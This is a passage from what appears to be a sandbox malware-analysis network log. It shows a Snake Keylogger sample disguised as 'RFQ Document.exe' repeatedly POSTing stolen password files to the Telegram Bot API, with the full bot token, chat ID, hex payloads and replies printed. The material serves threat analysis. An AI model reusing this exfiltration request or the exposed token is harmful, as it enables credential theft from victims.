{"ok":true,"result":{"message_id":12860,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808783,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
273	192.168.2.4	50110	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:44 UTC	434	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f385b3d9 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:44 UTC	435	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 38 35 62 33 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f385b3d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:44 UTC	435	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:44 UTC	435	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12862,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
274	192.168.2.4	50111	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:44 UTC	436	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f3a4b001 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:44 UTC	436	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 61 34 62 30 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f3a4b001Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:44 UTC	437	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:44 UTC	437	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12863,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
275	192.168.2.4	50112	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:44 UTC	437	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f3c3aea9 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:44 UTC	438	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 63 33 61 65 61 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f3c3aea9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:44 UTC	438	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:44 UTC	439	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12864,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
276	192.168.2.4	50113	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:44 UTC	439	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f3db8728 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:44 UTC	439	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 64 62 38 37 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f3db8728Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:44 UTC	440	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:44 UTC	440	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12865,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
277	192.168.2.4	50114	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:44 UTC	441	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f3f8239e Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:44 UTC	441	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 33 66 38 32 33 39 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f3f8239eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:44 UTC	441	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:44 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:44 UTC	442	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12866,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808784,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
278	192.168.2.4	50115	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:45 UTC	442	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f41721ba Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:45 UTC	443	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 31 37 32 31 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f41721baContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:45 UTC	443	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:45 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:45 UTC	443	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12867,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
279	192.168.2.4	50116	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:45 UTC	444	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255f42efb39 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:45 UTC	444	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 34 32 65 66 62 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255f42efb39Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:45 UTC	445	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:45 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:45 UTC	445	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 38 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12868,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808785,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.4	49802	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:26 UTC	44	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c53eb995 Host: api.telegram.org Content-Length: 407
